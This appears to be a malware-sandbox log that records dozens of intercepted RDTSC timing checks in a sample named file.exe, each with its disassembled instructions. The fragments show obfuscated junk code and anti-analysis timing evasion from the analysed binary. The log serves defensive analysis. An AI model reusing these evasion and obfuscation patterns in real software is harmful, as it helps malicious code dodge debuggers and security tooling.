Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F37400 second address: F37408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F37408 second address: F3740C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3740C second address: F37420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FDE71263CE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FDE71263CE6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F39DCA second address: F39DD0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F39FD4 second address: F39FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F39FD8 second address: F39FDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F39FDE second address: F3A020 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dl, 13h 0x0000000c push 00000004h 0x0000000e mov dx, 96B2h 0x00000012 push D97839DEh 0x00000017 pushad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FDE71263CEFh 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jc 00007FDE71263CE6h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3A020 second address: F3A024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3A32E second address: F3A342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3A342 second address: F3A34C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDE70D000C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3A34C second address: F3A35A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CEAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3A35A second address: F3A35E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3D74B second address: F3D769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CF8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3D769 second address: F3D76D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3D76D second address: F3D78E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 je 00007FDE71263CE6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3D78E second address: F3D7B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D8h 0x00000007 jmp 00007FDE70D000CEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3D7B8 second address: F3D7D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FDE71263CF8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000BC3 second address: 5000BEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FDE70D00128h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDE70D000D5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000BEF second address: 5000BFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000BFF second address: 5000C88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add eax, ecx 0x0000000a pushad 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007FDE70D000D8h 0x00000012 and esi, 5FCCB318h 0x00000018 jmp 00007FDE70D000CBh 0x0000001d popfd 0x0000001e pop esi 0x0000001f mov ecx, edx 0x00000021 popad 0x00000022 mov eax, dword ptr [eax+00000860h] 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FDE70D000D1h 0x0000002f and ecx, 3DFDDCB6h 0x00000035 jmp 00007FDE70D000D1h 0x0000003a popfd 0x0000003b popad 0x0000003c test eax, eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FDE70D000D8h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000C88 second address: 5000CA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FDEE1C99DAEh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000CA3 second address: 5000CBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4AA55 second address: E4AA5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4AA5B second address: E4AA5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4AE46 second address: E4AE56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 502005C second address: 5020071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE70D000D1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5020071 second address: 5020075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5020075 second address: 5020099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDE70D000D8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5020099 second address: 502009F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 502009F second address: 50200A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50200A3 second address: 50200DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FDE71263CF2h 0x00000012 sub ch, 00000008h 0x00000015 jmp 00007FDE71263CEBh 0x0000001a popfd 0x0000001b popad 0x0000001c mov ecx, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50200DB second address: 50200DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50200DF second address: 50200E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5020109 second address: 502010F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 502010F second address: 5020113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5020113 second address: 5020125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, 1F866D3Fh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501070A second address: 5010738 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDE71263CF7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010738 second address: 5010797 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDE70D000CFh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FDE70D000CFh 0x00000013 xchg eax, esi 0x00000014 pushad 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop edx 0x00000018 jmp 00007FDE70D000CEh 0x0000001d popad 0x0000001e jmp 00007FDE70D000D2h 0x00000023 popad 0x00000024 lea eax, dword ptr [ebp-04h] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FDE70D000CAh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010797 second address: 50107A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50107A6 second address: 50107AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 1Ah 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50107AD second address: 50107D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FDE71263CEAh 0x0000000f xor cx, 3208h 0x00000014 jmp 00007FDE71263CEBh 0x00000019 popfd 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50107D5 second address: 5010836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FDE70D000D4h 0x0000000a adc eax, 1B145468h 0x00000010 jmp 00007FDE70D000CBh 0x00000015 popfd 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007FDE70D000D9h 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007FDE70D000D3h 0x00000027 mov ah, FBh 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010869 second address: 50108AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, CB59h 0x00000008 popad 0x00000009 push ecx 0x0000000a pushfd 0x0000000b jmp 00007FDE71263CF5h 0x00000010 jmp 00007FDE71263CEBh 0x00000015 popfd 0x00000016 pop eax 0x00000017 popad 0x00000018 cmp dword ptr [ebp-04h], 00000000h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FDE71263CF2h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50108AF second address: 50108F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov dl, E0h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FDE70D000D2h 0x00000013 xor ecx, 5F9992A8h 0x00000019 jmp 00007FDE70D000CBh 0x0000001e popfd 0x0000001f mov dx, cx 0x00000022 popad 0x00000023 je 00007FDE70D000F4h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50108F1 second address: 50108F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50108F7 second address: 50108FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010072 second address: 501007A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501007A second address: 50100B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, dx 0x00000007 popad 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b jmp 00007FDE70D000D7h 0x00000010 push FFFFFFFEh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007FDE70D000CBh 0x0000001a pop esi 0x0000001b mov dh, 5Eh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50100B0 second address: 50100E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FDE71263CE9h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov esi, ebx 0x00000013 call 00007FDE71263CF7h 0x00000018 pop ecx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50100E6 second address: 5010107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010107 second address: 5010123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010123 second address: 5010135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE70D000CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010135 second address: 501015D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDE71263CF8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501015D second address: 5010163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010163 second address: 501019C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FDE71263CEAh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f pushad 0x00000010 mov eax, edx 0x00000012 push edi 0x00000013 mov edi, eax 0x00000015 pop ecx 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b jmp 00007FDE71263CF2h 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501019C second address: 50101A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50101A0 second address: 50101A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50101A6 second address: 50101FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 29D7EAA5h 0x0000000e jmp 00007FDE70D000D1h 0x00000013 add dword ptr [esp], 4BCD40CBh 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007FDE70D000CAh 0x00000023 xor ax, 9308h 0x00000028 jmp 00007FDE70D000CBh 0x0000002d popfd 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50101FA second address: 5010269 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 mov edi, esi 0x0000000a pop ecx 0x0000000b popad 0x0000000c mov eax, dword ptr fs:[00000000h] 0x00000012 jmp 00007FDE71263CF3h 0x00000017 nop 0x00000018 pushad 0x00000019 mov ebx, ecx 0x0000001b jmp 00007FDE71263CF0h 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FDE71263CF1h 0x00000029 and ax, 6E36h 0x0000002e jmp 00007FDE71263CF1h 0x00000033 popfd 0x00000034 mov bh, al 0x00000036 popad 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010269 second address: 501026D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501026D second address: 5010271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010271 second address: 5010277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010277 second address: 501029B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501029B second address: 50102B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50102B6 second address: 50102FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FDE71263CEEh 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 call 00007FDE71263CF7h 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50102FE second address: 501032F instructions: 0x00000000 rdtsc 0x00000002 mov ax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dx, 16D8h 0x0000000b popad 0x0000000c xchg eax, ebx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop ecx 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FDE70D000D9h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501032F second address: 501035C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, edx 0x00000011 jmp 00007FDE71263CEFh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501035C second address: 501039A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FDE70D000CEh 0x0000000f push eax 0x00000010 jmp 00007FDE70D000CBh 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501039A second address: 501039F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501039F second address: 50103E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDE70D000D8h 0x00000009 sub eax, 0F5871E8h 0x0000000f jmp 00007FDE70D000CBh 0x00000014 popfd 0x00000015 mov ax, 35DFh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [75AB4538h] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push ebx 0x00000025 pop eax 0x00000026 movsx edi, cx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50103E2 second address: 50103E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50103E8 second address: 501040E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [ebp-08h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501040E second address: 5010414 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010414 second address: 50104ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDE70D000D8h 0x00000009 adc esi, 4E4A3908h 0x0000000f jmp 00007FDE70D000CBh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FDE70D000D8h 0x0000001b or esi, 3B76DB68h 0x00000021 jmp 00007FDE70D000CBh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a xor eax, ebp 0x0000002c jmp 00007FDE70D000CFh 0x00000031 nop 0x00000032 jmp 00007FDE70D000D6h 0x00000037 push eax 0x00000038 jmp 00007FDE70D000CBh 0x0000003d nop 0x0000003e jmp 00007FDE70D000D6h 0x00000043 lea eax, dword ptr [ebp-10h] 0x00000046 jmp 00007FDE70D000D0h 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FDE70D000D7h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50104ED second address: 50104F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50104F3 second address: 50104F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50104F7 second address: 5010556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-18h], esp 0x0000000b pushad 0x0000000c mov bl, C9h 0x0000000e pushfd 0x0000000f jmp 00007FDE71263CF6h 0x00000014 add cx, 5748h 0x00000019 jmp 00007FDE71263CEBh 0x0000001e popfd 0x0000001f popad 0x00000020 mov eax, dword ptr fs:[00000018h] 0x00000026 jmp 00007FDE71263CF6h 0x0000002b mov ecx, dword ptr [eax+00000FDCh] 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010556 second address: 501055C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501055C second address: 501059E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, ecx 0x0000000b jmp 00007FDE71263CF0h 0x00000010 jns 00007FDE71263D1Bh 0x00000016 pushad 0x00000017 mov eax, 1DCD0F4Dh 0x0000001c call 00007FDE71263CEAh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501059E second address: 50105AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 add eax, ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
